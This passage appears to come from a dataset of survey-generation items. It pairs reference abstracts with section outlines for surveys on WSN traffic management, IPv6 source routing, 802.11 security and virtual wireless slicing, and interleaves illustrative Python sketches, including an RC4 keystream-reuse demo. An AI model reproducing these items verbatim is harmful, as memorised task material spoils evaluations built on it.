(HMM).
This method helps determine the current state of the detected traffic light from the states obtained by image processing, aiming for the best performance in determining traffic light states. With the method proposed in this paper, we obtained 90.55% accuracy in detecting the traffic light state, versus 78.54% obtained using image processing alone. The recognition of traffic lights using image processing still depends heavily on the capture conditions of each frame from the video camera. In this context, the addition of a pre-processing stage before image processing could help improve this aspect and provide better results in determining the traffic light state. --- paper_title: An Intelligent Fuzzy Control for Crossroads Traffic Light paper_content: A fuzzy control algorithm that performs intelligent control of a single crossroads traffic light with twelve phases and three traffic lanes, and works well under real-time traffic flow with flexible operation, is presented. The procedure can be described as follows: first, the number of vehicles in all lanes is obtained through the sensors, and the phase with the largest number is given the highest priority; when the signal moves from the previous phase to the next, it switches to this highest-priority phase. Then the best green light duration is determined by fuzzy-rule reasoning on the current waiting queue length and the overall queue length. The simulation results indicate that vehicle delay time under the fuzzy control method is greatly improved compared with the traditional fixed-time control method. --- paper_title: Towards tag antenna based sensing - An RFID displacement sensor paper_content: Displacements can be used as indicators of structural health and are measured by commercially available sensors that need to be accurate and cost effective. In this paper, we examine a technique to utilize a UHF RFID tag antenna as a displacement sensor by mapping structural deformation to a change in RFID tag characteristics. We evaluate how changes in two different parameters, a) tag backscatter power and b) minimum reader transmit power required for RFID chip activation, can be mapped to structural deformation. The theoretical principles of sensor development are first discussed followed by a presentation of the results of experimentation. It is demonstrated that the sensor is sensitive to displacements for a dynamic range of 40 mm. --- paper_title: A dynamic traffic light management system based on wireless sensor networks for the reduction of the red-light running phenomenon paper_content: Real-time knowledge of information concerning traffic light junctions is a valid solution to congestion problems, with the main aim of reducing accidents as much as possible. Red Light Running (RLR) is a behavioural phenomenon that occurs when the driver must choose whether or not to cross the road when the traffic light changes from green to yellow. Most of the time, drivers cross even during the transition from yellow to red and, as a consequence, the possibility of accidents increases. This often occurs because drivers wait too long in the traffic light queue as a consequence of the traffic light not being well balanced. In this paper we propose a technique that, based on information gathered through a wireless sensor network, dynamically computes the green times of a traffic light at an isolated intersection.
The main aim is to optimise the waiting time in the queue and, as a consequence, reduce the RLR phenomenon occurrence. --- paper_title: Feasibility of deploying wireless sensor based road side solutions for Intelligent Transportation Systems paper_content: The effectiveness of Intelligent Transportation Systems depends on the accuracy and timely reliable provisioning of real time data supplied by traffic data collection mechanisms. Data collection through wireless sensor networks is a very effective approach due to their easy installation, low cost, processing capabilities, small size, flexibility, and wireless communication capabilities. WSN are used in ITS for smart parking lots, adaptive traffic light control, accident avoidance and traffic estimation etc. In this paper we propose a WSN based road side communication architecture and system that can be utilized for the intelligent control and management of vehicular traffic at road intersections. In the proposed architecture, the end nodes are carried by vehicles that communicate with road side units, which in turn send the data to the coordinator module at the intersection. We introduce a reliable and robust channel switching technique that reduces the response time, energy consumption and connectivity delay while increasing the reliability of packet delivery. We perform sensitivity analysis of the proposed system architecture by varying various communication parameters to determine optimum system configuration. The results prove the integrity and feasibility of the deployment of our proposed architecture. --- paper_title: Using DTMon to monitor transient flow traffic paper_content: We evaluate the performance of the DTMon dynamic traffic monitoring system to measure travel times and speeds in transient flow traffic caused by non-recurring congestion. DTMon uses vehicular networks and roadside infrastructure to collect data from passing vehicles. We show DTMon's ability to gather high-quality real-time traffic data such as travel time and speed. These metrics can be used to detect transitions in traffic flow (e.g., caused by congestion) especially where accurate flow rate information is not available. We evaluate the accuracy and latency of DTMon in providing traffic measurements using two different methods of message delivery. We show the advantages of using dynamically-defined measurement points for monitoring transient flow traffic. We compare DTMon with currently in-use probe-based systems (e.g., AVL) and fixed-point sensors and detectors (e.g., ILD). ---
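Several of the WSN-based schemes collected above (e.g., TAPIOCA and the TSCA/TSTMA controller) derive each phase's green time from queue lengths or waiting times reported by roadside sensor nodes. The sketch below is only a rough illustration of that general idea, not the rule published by any of the cited papers; the function name, cycle budget and bounds are invented for the example.

```python
def allocate_green_times(queue_lengths, cycle_budget=90, g_min=10, g_max=60):
    """Split a signal cycle among phases in proportion to sensed queue lengths.

    queue_lengths: dict mapping phase id -> number of queued vehicles
                   (as reported by the wireless sensor nodes).
    cycle_budget:  total green time available in one cycle (seconds).
    g_min, g_max:  per-phase bounds, so no phase starves or monopolises the cycle.
    """
    total = sum(queue_lengths.values())
    greens = {}
    for phase, q in queue_lengths.items():
        if total == 0:
            share = cycle_budget / len(queue_lengths)   # no demand: split evenly
        else:
            share = cycle_budget * q / total            # proportional to demand
        greens[phase] = max(g_min, min(g_max, round(share)))
    return greens

# Example: the north-south approach is congested, east-west is light.
print(allocate_green_times({"NS": 42, "EW": 8}))   # -> {'NS': 60, 'EW': 14}
```

In a real controller the queue estimates would be refreshed every cycle from the sensor reports, and the clamping keeps minor phases from being starved even under very unbalanced arrivals.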
Title: A Survey on Urban Traffic Management System Using Wireless Sensor Networks Section 1: Introduction Description 1: This section introduces the problem of increased vehicle usage, traffic congestion, and the need for intelligent traffic management systems using wireless sensor networks. Section 2: Key Issues in Urban Traffic Management System Description 2: This section discusses the key issues related to urban traffic management, such as recurring and non-recurring traffic congestion, and the detection of non-recurring congestion. Section 3: Overview Description 3: This section provides an overview of the sensing evolution, traffic sensing technologies, the characteristics of a general sensor node, and the hierarchical functionality of a WSN-based urban traffic management system. Section 4: Sensing Evolution Description 4: This section details the development and advancements in sensor technology and their applications in traffic management. Section 5: Traffic Sensing Technologies Description 5: This section describes various traffic sensing technologies including their advantages and disadvantages in terms of installation, maintenance, and performance. Section 6: General Sensor Node Description 6: This section elaborates on the components and functionalities of a general sensor node in traffic monitoring. Section 7: Hierarchy of Urban Traffic Management Systems Description 7: This section explains the structure and functions of the three subsystems in an urban traffic management system. Section 8: State-of-the-Art Review Description 8: This section reviews related projects, architectures, data collection schemes, routing algorithms, congestion avoidance schemes, priority-based traffic management schemes, and average waiting time reduction schemes. Section 9: Related Projects Description 9: This section introduces various projects on urban traffic management that focus on different traffic parameters. Section 10: Specific Architectures, Data Collection Schemes, and Routing Algorithms Description 10: This section discusses explicit architectures, data collection schemes, and routing algorithms proposed for WSN-based urban traffic management. Section 11: Congestion Avoidance Schemes Description 11: This section outlines several WSN-based schemes and techniques developed to reduce traffic congestion. Section 12: Priority-Based Traffic Management Schemes Description 12: This section details WSN-based traffic management schemes designed to prioritize emergency vehicles. Section 13: Average Waiting Time Reduction Schemes Description 13: This section presents various WSN-based methodologies for reducing the average waiting time of vehicles at intersections. Section 14: Challenges Description 14: This section discusses significant challenges and issues faced by WSN-based traffic management systems, such as connectivity, coverage, energy cost, congestion, and real-time incident notifications. Section 15: Conclusions and Future Work Description 15: This section provides a summary of the survey, discusses the main challenges, and outlines potential directions for future research in urban traffic management systems using WSNs.
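One of the references collected above combines noisy per-frame image-processing detections with a Hidden Markov Model to estimate the traffic light state. A minimal forward-filter sketch of that idea follows; the transition and emission probabilities are made up purely for illustration and do not come from the cited paper.

```python
STATES = ["red", "green", "yellow"]

# Made-up transition model: a light mostly stays in its current state between frames.
TRANS = {
    "red":    {"red": 0.95, "green": 0.05, "yellow": 0.00},
    "green":  {"red": 0.00, "green": 0.95, "yellow": 0.05},
    "yellow": {"red": 0.10, "green": 0.00, "yellow": 0.90},
}
# Made-up emission model: the image-processing detector is right about 80% of the time.
EMIT = {s: {o: (0.8 if o == s else 0.1) for o in STATES} for s in STATES}

def hmm_filter(detections, prior=None):
    """Forward-filter a sequence of noisy per-frame detections into a state belief."""
    belief = prior or {s: 1.0 / len(STATES) for s in STATES}
    for obs in detections:
        # Predict: propagate the belief through the transition model.
        predicted = {s: sum(belief[p] * TRANS[p][s] for p in STATES) for s in STATES}
        # Update: weight each state by how likely it is to produce the observation.
        unnorm = {s: predicted[s] * EMIT[s][obs] for s in STATES}
        z = sum(unnorm.values())
        belief = {s: v / z for s, v in unnorm.items()}
    return max(belief, key=belief.get), belief

# A green light briefly misdetected as yellow stays classified as green.
print(hmm_filter(["green", "green", "yellow", "green"]))
```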
Source-Address-Dependent Routing and Source Address Selection for IPv6 Hosts: Overview of the Problem Space
7
--- paper_title: Ingress Filtering for Multihomed Networks paper_content: BCP 38, RFC 2827, is designed to limit the impact of distributed denial of service attacks, by denying traffic with spoofed addresses access to the network, and to help ensure that traffic is traceable to its correct source network. As a side effect of protecting the Internet against such attacks, the network implementing the solution also protects itself from this and other attacks, such as spoofed management access to networking equipment. There are cases when this may create problems, e.g., with multihoming. This document describes the current ingress filtering operational mechanisms, examines generic issues related to ingress filtering, and delves into the effects on multihoming in particular. This memo updates RFC 2827. --- paper_title: OSPF for IPv6 paper_content: This document describes the modifications to OSPF to support version 6 of the Internet Protocol (IPv6). The fundamental mechanisms of OSPF (flooding, DR election, area support, SPF calculations, etc.) remain unchanged. However, some changes have been necessary, either due to changes in protocol semantics between IPv4 and IPv6, or simply to handle the increased address size of IPv6. --- paper_title: IPv6 Multihoming without Network Address Translation paper_content: Network Address and Port Translation (NAPT) works well for conserving ::: global addresses and addressing multihoming requirements because an ::: IPv4 NAPT router implements three functions: source address selection, ::: next-hop resolution, and (optionally) DNS resolution. For IPv6 hosts, ::: one approach could be the use of IPv6-to-IPv6 Network Prefix ::: Translation (NPTv6). However, NAT and NPTv6 should be avoided, if at ::: all possible, to permit transparent end-to-end connectivity. In this ::: document, we analyze the use cases of multihoming. We also describe ::: functional requirements and possible solutions for multihoming without ::: the use of NAT in IPv6 for hosts and small IPv6 networks that would ::: otherwise be unable to meet minimum IPv6-allocation criteria. We ::: conclude that DHCPv6-based solutions are suitable to solve the ::: multihoming issues described in this document, but NPTv6 may be ::: required as an intermediate solution. --- paper_title: Distributing Address Selection Policy Using DHCPv6 paper_content: RFC 6724 defines default address selection mechanisms for IPv6 that ::: allow nodes to select an appropriate address when faced with multiple ::: source and/or destination addresses to choose between. RFC 6724 allows ::: for the future definition of methods to administratively configure the ::: address selection policy information. This document defines a new ::: DHCPv6 option for such configuration, allowing a site administrator to ::: distribute address selection policy overriding the default address ::: selection parameters and policy table, and thus allowing the ::: administrator to control the address selection behavior of nodes in ::: their site. ---
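The last two abstracts above revolve around two cooperating mechanisms: picking a source address (RFC 6724 style selection, possibly overridden by a distributed policy) and then forwarding the packet via the provider that assigned that address, so ingress filtering does not drop it. The toy sketch below illustrates both halves under invented prefixes and next hops; it is not a host implementation, and only mimics RFC 6724's longest-matching-prefix rule rather than the full policy table.

```python
import ipaddress

# Hypothetical provisioning: two providers, each delegating one prefix with its own uplink.
PROVIDERS = [
    {"prefix": ipaddress.ip_network("2001:db8:a::/48"), "next_hop": "fe80::1%eth0"},
    {"prefix": ipaddress.ip_network("2001:db8:b::/48"), "next_hop": "fe80::1%eth1"},
]

def select_source(candidates, destination):
    """Pick the candidate source sharing the longest prefix with the destination
    (a simplified stand-in for RFC 6724 rule 8; the real policy table has more rules)."""
    dst = ipaddress.ip_address(destination)
    def common_prefix_len(addr):
        a, b = int(addr), int(dst)
        return 128 - (a ^ b).bit_length() if a != b else 128
    return max((ipaddress.ip_address(c) for c in candidates), key=common_prefix_len)

def select_next_hop(source):
    """Source-address-dependent routing: exit via the provider that owns the source prefix."""
    for entry in PROVIDERS:
        if source in entry["prefix"]:
            return entry["next_hop"]
    raise LookupError("no provider prefix matches this source address")

src = select_source(["2001:db8:a::10", "2001:db8:b::10"], "2001:db8:b:5::1")
print(src, "->", select_next_hop(src))   # 2001:db8:b::10 -> fe80::1%eth1
```

On a Linux router the same per-source-prefix forwarding is usually expressed with policy routing rules (one routing table per provider, selected by the packet's source prefix) rather than in application code.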
Title: Source-Address-Dependent Routing and Source Address Selection for IPv6 Hosts: Overview of the Problem Space Section 1: Introduction Description 1: This section provides an introduction to the paper, explaining the overall context and importance of source-address-dependent routing (SADR) and the issues that arise due to ingress filtering, especially in multihomed networks. Section 2: Scope Description 2: This section outlines the scenarios where source address dependent routing is necessary from the host's perspective, elaborating on different configurations and setups, including multi-prefix multi-interface scenarios and corporate VPNs. Section 3: Scenario 2: Multi-Prefix Multihoming Description 3: This section delves into the specific multi-prefix multihoming use case, explaining the challenges and the need for source address dependent routing to prevent packet drops due to ingress filtering in various networking environments, including home networks. Section 4: Analysis of Source Address Dependent Routing Description 4: This section presents an analysis of the previously discussed scenarios, examining the relevance and application of SADR in different provisioning domains and how proper configuration can mitigate issues. Section 5: Scenarios Analysis Description 5: This section analyzes the scenarios detailed earlier, discussing potential solutions and configurations to avoid ingress filtering and maintain proper routing. Section 6: Discussion on Alternate Solutions Description 6: This section provides a discussion on alternative solutions to SADR, including source address selection rules and the necessary information that hosts need for correct source address selection without making specific recommendations. Section 7: Router Advertisement Option Description 7: This section discusses the need for new router advertisement options for source address dependent routing, including route prefix with source address/prefix option and the configuration requirements for both router advertisement and DHCP options.
A Survey of Wireless Security
10
--- paper_title: Static and dynamic 4-way handshake solutions to avoid denial of service attack in Wi-Fi protected access and IEEE 802.11i paper_content: This paper focuses on WPA and IEEE 802.11i protocols that represent two important solutions in the wireless environment. Scenarios where it is possible to produce a DoS attack and DoS flooding attacks are outlined. The last phase of the authentication process, represented by the 4-way handshake procedure, is shown to be unsafe from DoS attack. This can produce the undesired effect of memory exhaustion if a flooding DoS attack is conducted. In order to avoid DoS attack without increasing the complexity of wireless mobile devices too much and without changing through some further control fields of the frame structure of wireless security protocols, a solution is found and an extension of WPA and IEEE 802.11 is proposed. A protocol extension with three "static" variants and with a resource-aware dynamic approach is considered. The three enhancements to the standard protocols are achieved through some simple changes on the client side and they are robust against DoS and DoS flooding attack. Advantages introduced by the proposal are validated by simulation campaigns and simulation parameters such as attempted attacks, successful attacks, and CPU load, while the algorithm execution time is evaluated. Simulation results show how the three static solutions avoid memory exhaustion and present a good performance in terms of CPU load and execution time in comparison with the standard WPA and IEEE 802.11i protocols. However, if the mobile device presents different resource availability in terms of CPU and memory or if resource availability significantly changes in time, a dynamic approach that is able to switch among three different modalities could be more suitable. --- paper_title: A trivial denial of service attack on IEEE 802.11 direct sequence spread spectrum wireless LANs paper_content: The paper describes a trivial, but highly effective, denial of service attack based on commonly available IEEE 802.11 hardware and freely available software. The attack requires limited resources and is inexpensive to mount. The paper discusses the attack, its implementation, and provides an analysis of methods to achieve optimal denial of service results. While there is currently no defense against this type of attack, the paper also discusses possibilities for attack mitigation. --- paper_title: Holistic approach to Wep protocol in securing wireless network infrastructure paper_content: Constant increase in use of wireless infrastructure networks for business purposes created a need for strong safety mechanisms. This paper describes WEP (Wired Equivalent Privacy) protocol for the protection of wireless networks, its security deficiencies, as well as the various kinds of attacks that can jeopardize security goals of WEP protocol: authentication confidentiality and integrity. The paper, also, gives a summary of security improvements of WEP protocol that can lead to the higher level of wireless network infrastructure protection. Comparative analysis shows the advantages of the new 802.11i standard in comparison to the previous security solutions. A proposal of possible security improvements of RSNA (Robust Security Network Association) is presented. 
--- paper_title: Intercepting mobile communications: the insecurity of 802.11 paper_content: The 802.11 standard for wireless networks includes a Wired Equivalent Privacy (WEP) protocol, used to protect link-layer communications from eavesdropping and other attacks. We have discovered several serious security flaws in the protocol, stemming from mis-application of cryptographic primitives. The flaws lead to a number of practical attacks that demonstrate that WEP fails to achieve its security goals. In this paper, we discuss in detail each of the flaws, the underlying security principle violations, and the ensuing attacks. --- paper_title: Some Remarks on the TKIP Key Mixing Function of IEEE 802.11i paper_content: Temporal key integrity protocol (TKIP) is a sub-protocol of IEEE 802.11i. TKIP remedies some security flaws in wired equivalent privacy (WEP) protocol. TKIP adds four new algorithms to WEP: a message integrity code (MIC) called Michael, an initialization vector (IV) sequencing discipline, a key mixing function and a re-keying mechanism. The key mixing function, also called temporal key hash, de-correlates the IVs from weak keys. Some cryptographic properties of the substitution box (S-box) used in the key mixing function are investigated in this paper, such as regularity, avalanche effect, differ uniform and linear structure. Moen et al pointed out that there existed a temporal key recovery attack in TKIP key mixing function. In this paper a method is proposed to defend against the attack, and the resulting effect on performance is discussed. --- paper_title: Counter with CBC-MAC (CCM) paper_content: Counter with CBC-MAC (CCM) is a generic authenticated encryption block cipher mode. CCM is defined for use with 128-bit block ciphers, such as the Advanced Encryption Standard (AES). --- paper_title: Experiences in passively detecting session hijacking attacks in IEEE 802.11 networks paper_content: Current IEEE 802.11 wireless networks are vulnerable to session hijacking attacks as the existing standards fail to address the lack of authentication of management frames and network card addresses, and rely on loosely coupled state machines. Even the new WLAN security standard - IEEE 802.11i does not address these issues. In our previous work, we proposed two new techniques for improving detection of session hijacking attacks that are passive, computationally inexpensive, reliable, and have minimal impact on network performance. These techniques utilise unspoofable characteristics from the MAC protocol and the physical layer to enhance confidence in the intrusion detection process. This paper extends our earlier work and explores usability, robustness and accuracy of these intrusion detection techniques by applying them to eight distinct test scenarios. A correlation engine has also been introduced to maintain the false positives and false negatives at a manageable level. We also explore the process of selecting optimum thresholds for both detection techniques. For the purposes of our experiments, Snort-Wireless open source wireless intrusion detection system was extended to implement these new techniques and the correlation engine. Absence of any false negatives and low number of false positives in all eight test scenarios successfully demonstrated the effectiveness of the correlation engine and the accuracy of the detection techniques. ---
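The WEP analyses above (notably "Intercepting mobile communications") hinge on the fact that RC4 is a stream cipher: two frames encrypted under the same key and IV share a keystream, so XORing their ciphertexts cancels the keystream and leaks the XOR of the plaintexts. The toy demonstration below reimplements textbook RC4 (KSA plus PRGA) purely to show that effect; it is not WEP's exact framing, and the key and messages are invented.

```python
def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4: key-scheduling algorithm (KSA) then PRGA output of `length` bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # KSA
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):                   # PRGA
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

key = b"\x01\x02\x03" + b"secret-root-key"      # same (IV || key) reused for both frames
p1, p2 = b"OPEN THE GATE NOW", b"KEEP GATE CLOSED!"
c1 = xor(p1, rc4_keystream(key, len(p1)))
c2 = xor(p2, rc4_keystream(key, len(p2)))

# Keystream reuse: the ciphertext XOR equals the plaintext XOR, no key required.
assert xor(c1, c2) == xor(p1, p2)
```

WEP's 24-bit IV space makes such keystream collisions frequent in practice, which is exactly the keystream-reuse weakness the cited work exploits.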
Title: A Survey of Wireless Security Section 1: Introduction Description 1: This section introduces the topic of wireless network security, highlighting the growing popularity of wireless networks, their advantages, and the need for security mechanisms. Section 2: Security Threats to 802.11 Wireless Networks Description 2: This section describes various security threats that can jeopardize the security of 802.11 wireless networks, including attacks on confidentiality, integrity, and availability. Section 3: WEP Protocol Description 3: This section explains the WEP protocol, its functions, and how it aims to provide data security for wireless networks. Section 4: Security Deficiencies of WEP Protocol Description 4: This section details the security deficiencies of the WEP protocol, including risks of keystream reuse, key management issues, message modification, injection, and decryption vulnerabilities. Section 5: Safety Improvements of WEP Description 5: This section describes significant safety improvements of WEP protocol, including comparisons with WPA and WPA2, and the new IEEE 802.11i standard. Section 6: RSA Patch for WEP Description 6: This section explains the RSA patch for WEP, an improvement designed to generate unique keys for each packet to enhance security. Section 7: Wi-Fi Protection Description 7: This section details Wi-Fi Protected Access (WPA), its features, and enhancements over WEP to provide stronger protection for wireless networks. Section 8: TKIP Description 8: This section explains the Temporal Key Integrity Protocol (TKIP), a set of algorithms designed to improve and solve security problems of WEP. Section 9: 802.1x Description 9: This section discusses the 802.1x standard for secure network access and its role in wireless security, including its authentication mechanisms. Section 10: RC4 and AES Cryptographic Algorithms Description 10: This section describes the RC4 and AES cryptographic algorithms, their functionalities, and their roles in ensuring data confidentiality and integrity in wireless networks. Section 11: Conclusion Description 11: This section summarizes the survey, highlighting the key points about wireless security protocols, their improvements, and remaining challenges.
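The CCM reference collected above underlies CCMP, the AES-based protection used by WPA2/802.11i. As a hedged illustration only, the snippet below exercises AES in CCM mode through the third-party "cryptography" package; it shows the authenticated-encryption behaviour, not the actual CCMP frame format, which derives its 13-byte nonce from the packet number and transmitter address rather than at random.

```python
# Requires the third-party "cryptography" package (pip install cryptography).
import os
from cryptography.hazmat.primitives.ciphers.aead import AESCCM

key = AESCCM.generate_key(bit_length=128)   # CCMP uses AES-128 in CCM mode
aesccm = AESCCM(key)                        # default 16-byte authentication tag

nonce = os.urandom(13)                      # placeholder for CCMP's packet-number-based nonce
header = b"frame-header-bytes"              # authenticated but not encrypted (like AAD in CCMP)
payload = b"confidential frame body"

ciphertext = aesccm.encrypt(nonce, payload, header)
assert aesccm.decrypt(nonce, ciphertext, header) == payload

# Any tampering with the ciphertext or the authenticated header is rejected.
try:
    aesccm.decrypt(nonce, ciphertext, b"forged-header")
except Exception as err:                    # the library raises an invalid-tag error here
    print("integrity check failed:", type(err).__name__)
```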
Resource Slicing in Virtual Wireless Networks: A Survey
13
--- paper_title: Software-Defined and Virtualized Future Mobile and Wireless Networks: A Survey paper_content: With the proliferation of mobile demands and increasingly multifarious services and applications, mobile Internet has been an irreversible trend. Unfortunately, the current mobile and wireless network (MWN) faces a series of pressing challenges caused by the inherent design. In this paper, we extend two latest and promising innovations of Internet, software-defined networking and network virtualization, to mobile and wireless scenarios. We first describe the challenges and expectations of MWN, and analyze the opportunities provided by the software-defined wireless network (SDWN) and wireless network virtualization (WNV). Then, this paper focuses on SDWN and WNV by presenting the main ideas, advantages, ongoing researches and key technologies, and open issues respectively. Moreover, we interpret that these two technologies highly complement each other, and further investigate efficient joint design between them. This paper confirms that SDWN and WNV may efficiently address the crucial challenges of MWN and significantly benefit the future mobile and wireless network. --- paper_title: Network Virtualization: Technologies, Perspectives, and Frontiers paper_content: Network virtualization refers to a broad set of technologies. Commercial solutions have been offered by the industry for years, while more recently the academic community has emphasized virtualization as an enabler for network architecture research, deployment, and experimentation. We review the entire spectrum of relevant approaches with the goal of identifying the underlying commonalities. We offer a unifying definition of the term “network virtualization” and examine existing approaches to bring out this unifying perspective. We also discuss a set of challenges and research directions that we expect to come to the forefront as network virtualization technologies proliferate. --- paper_title: Mobile Network Resource Sharing Options: Performance Comparisons paper_content: Resource sharing among mobile network operators is a promising way to tackle growing data demand by increasing capacity and reducing costs of network infrastructure deployment and operation. In this work, we evaluate sharing options that range from simple approaches that are feasible in the near-term on traditional infrastructure to complex methods that require specialized/virtualized infrastructure. We build a simulation testbed supporting two geographically overlapped 4G LTE macro cellular networks and model the sharing architecture/process between the network operators. We compare Capacity Sharing (CS) and Spectrum Sharing (SS) on traditional infrastructure and Virtualized Spectrum Sharing (VSS) and Virtualized PRB Sharing (VPS) on virtualized infrastructure under light, moderate and heavy user loading scenarios in collocated and noncollocated E-UTRAN deployment topologies. We also study these sharing options in conservative and aggressive sharing participation modes. Based on simulation results, we conclude that CS, a generalization of traditional roaming, is the best performing and simplest option, SS is least effective and that VSS and VPS perform better than spectrum sharing with added complexity. --- paper_title: Virtual radio: a framework for configurable radio networks paper_content: Network virtualization has recently been proposed for the development of large scale experimental networks, but also as design principle for a Future Internet. 
In this paper we describe the background to network virtualization and extend this concept into the wireless domain, which we denote as radio virtualization. With radio virtualization different virtual radio networks can operate on top of a common shared infrastructure and share the same radio resources. We present how this radio resource sharing can be performed efficiently without interference between the different virtual radio networks. Further we discuss how radio transmission functionality can be configured. Radio virtualization provides flexibility in the design and deployment of new wireless networking concepts. It allows customization of radio networks for dedicated networking services at reduced deployment costs. --- paper_title: Wireless Network Virtualization: A Survey, Some Research Issues and Challenges paper_content: Since wireless network virtualization enables abstraction and sharing of infrastructure and radio spectrum resources, the overall expenses of wireless network deployment and operation can be reduced significantly. Moreover, wireless network virtualization can provide easier migration to newer products or technologies by isolating part of the network. Despite the potential vision of wireless network virtualization, several significant research challenges remain to be addressed before widespread deployment of wireless network virtualization, including isolation, control signaling, resource discovery and allocation, mobility management, network management and operation, and security as well as non-technical issues such as governance regulations, etc. In this paper, we provide a brief survey on some of the works that have already been done to achieve wireless network virtualization, and discuss some research issues and challenges. We identify several important aspects of wireless network virtualization: overview, motivations, framework, performance metrics, enabling technologies, and challenges. Finally, we explore some broader perspectives in realizing wireless network virtualization. --- paper_title: Programming Software-Defined wireless networks paper_content: Programming a mobile network requires to account for multiple complex operations, such as allocating radio resources and monitoring interference. Nevertheless, the current Software-Defined Networking ecosystem provides little support for mobile networks in term of radio data-plane abstractions, controllers, and programming primitives. Starting from the consideration that WiFi is becoming an integral part of the 5G architecture, we present a set of programming abstractions modeling three fundamental aspects of a WiFi network, namely state management of wireless clients, resource provisioning, and network state collection. The proposed abstractions hide away the implementation details of the underlying wireless technology providing programmers with expressive tools to control the state of the network. We also describe a proof-of-concept implementation of a Software-Defined Radio Access Network controller for WiFi networks and a Python-based Software Development Kit leveraging the proposed abstractions. The resulting platform can be effectively leveraged in order to implement typical control tasks such as mobility management and traffic engineering as well as applications and services such as multicast video delivery and/or dynamic content caching. 
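Several abstracts in this list (the resource-sharing comparison and the virtual radio framework) ultimately come down to dividing a common pool of radio resources, such as LTE physical resource blocks or airtime, among virtual operators according to agreed shares. The sketch below is only a schematic of such a slicer, not any cited scheme: it hands out the resource blocks of one subframe to slices by weight, using largest-remainder rounding so the whole pool is used; the slice names and weights are invented.

```python
def slice_resource_blocks(total_rbs, weights):
    """Split `total_rbs` resource blocks among slices proportionally to `weights`,
    using largest-remainder rounding so every block is assigned exactly once."""
    wsum = float(sum(weights.values()))
    exact = {s: total_rbs * w / wsum for s, w in weights.items()}
    alloc = {s: int(x) for s, x in exact.items()}          # floor of each share
    leftover = total_rbs - sum(alloc.values())
    # Give the remaining blocks to the slices with the largest fractional parts.
    for s in sorted(exact, key=lambda s: exact[s] - alloc[s], reverse=True)[:leftover]:
        alloc[s] += 1
    return alloc

# Example: 100 PRBs shared by three virtual operators with 50/30/20 agreements.
print(slice_resource_blocks(100, {"vMNO-A": 5, "vMNO-B": 3, "vMNO-C": 2}))
# -> {'vMNO-A': 50, 'vMNO-B': 30, 'vMNO-C': 20}
```

A real hypervisor would re-run such an allocation every scheduling interval and enforce isolation, so one slice's overload cannot eat into another slice's share.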
--- paper_title: SoftCell: scalable and flexible cellular core network architecture paper_content: Cellular core networks suffer from inflexible and expensive equipment, as well as from complex control-plane protocols. To address these challenges, we present SoftCell, a scalable architecture that supports fine-grained policies for mobile devices in cellular core networks, using commodity switches and servers. SoftCell enables operators to realize high-level service policies that direct traffic through sequences of middleboxes based on subscriber attributes and applications. To minimize the size of the forwarding tables, SoftCell aggregates traffic along multiple dimensions---the service policy, the base station, and the mobile device---at different switches in the network. Since most traffic originates from mobile devices, SoftCell performs fine-grained packet classification at the access switches, next to the base stations, where software switches can easily handle the state and bandwidth requirements. SoftCell guarantees that packets belonging to the same connection traverse the same sequence of middleboxes in both directions, even in the presence of mobility. We demonstrate that SoftCell improves the scalability and flexibility of cellular core networks by analyzing real LTE workloads, performing micro-benchmarks on our prototype controller as well as large-scale simulations. --- paper_title: Building Programmable Wireless Networks: An Architectural Survey paper_content: In recent times, there is increasing consensus that the traditional Internet architecture needs to be evolved for it to sustain unstinted growth and innovation. A major reason for the perceived architectural ossification is the lack of the ability to program the network as a system. This situation has resulted partly from historical decisions in the original Internet design which emphasized decentralized network operations through colocated data and control planes on each network device. The situation for wireless networks is no different resulting in a lot of complexity and a plethora of largely incompatible wireless technologies. With traditional architectures providing limited support for programmability, there is a broad realization in the wireless community that future programmable wireless networks would require significant architectural innovations. In this paper, we will present an unified overview of the programmability solutions that have been proposed at the device and the network level. In particular, we will discuss software-defined radio (SDR), cognitive radio (CR), programmable MAC processor, and programmable routers as device-level programmability solutions, and software-defined networking (SDN), cognitive wireless networking (CWN), virtualizable wireless networking (VWN) and cloud-based wireless networking (CbWN) as network-level programmability solutions. We provide both a self-contained exposition of these topics as well as a broad survey of the application of these trends in modern wireless networks. --- paper_title: Software-Defined and Virtualized Future Mobile and Wireless Networks: A Survey paper_content: With the proliferation of mobile demands and increasingly multifarious services and applications, mobile Internet has been an irreversible trend. Unfortunately, the current mobile and wireless network (MWN) faces a series of pressing challenges caused by the inherent design. 
In this paper, we extend two latest and promising innovations of Internet, software-defined networking and network virtualization, to mobile and wireless scenarios. We first describe the challenges and expectations of MWN, and analyze the opportunities provided by the software-defined wireless network (SDWN) and wireless network virtualization (WNV). Then, this paper focuses on SDWN and WNV by presenting the main ideas, advantages, ongoing researches and key technologies, and open issues respectively. Moreover, we interpret that these two technologies highly complement each other, and further investigate efficient joint design between them. This paper confirms that SDWN and WNV may efficiently address the crucial challenges of MWN and significantly benefit the future mobile and wireless network. --- paper_title: Can the Production Network Be the Testbed? paper_content: A persistent problem in computer network research is validation. When deciding how to evaluate a new feature or bug fix, a researcher or operator must trade-off realism (in terms of scale, actual user traffic, real equipment) and cost (larger scale costs more money, real user traffic likely requires downtime, and real equipment requires vendor adoption which can take years). Building a realistic testbed is hard because "real" networking takes place on closed, commercial switches and routers with special purpose hardware. But if we build our testbed from software switches, they run several orders of magnitude slower. Even if we build a realistic network testbed, it is hard to scale, because it is special purpose and is in addition to the regular network. It needs its own location, support and dedicated links. For a testbed to have global reach takes investment beyond the reach of most researchers. ::: ::: In this paper, we describe a way to build a testbed that is embedded in--and thus grows with--the network. The technique--embodied in our first prototype, FlowVisor--slices the network hardware by placing a layer between the control plane and the data plane. We demonstrate that FlowVisor slices our own production network, with legacy protocols running in their own protected slice, alongside experiments created by researchers. The basic idea is that if unmodified hardware supports some basic primitives (in our prototype, Open-Flow, but others are possible), then a worldwide testbed can ride on the coat-tails of deployments, at no extra expense. Further, we evaluate the performance impact and describe how FlowVisor is deployed at seven other campuses as part of a wider evaluation platform. --- paper_title: Towards programmable enterprise WLANS with Odin paper_content: We present Odin, an SDN framework to introduce programmability in enterprise wireless local area networks (WLANs). Enterprise WLANs need to support a wide range of services and functionalities. This includes authentication, authorization and 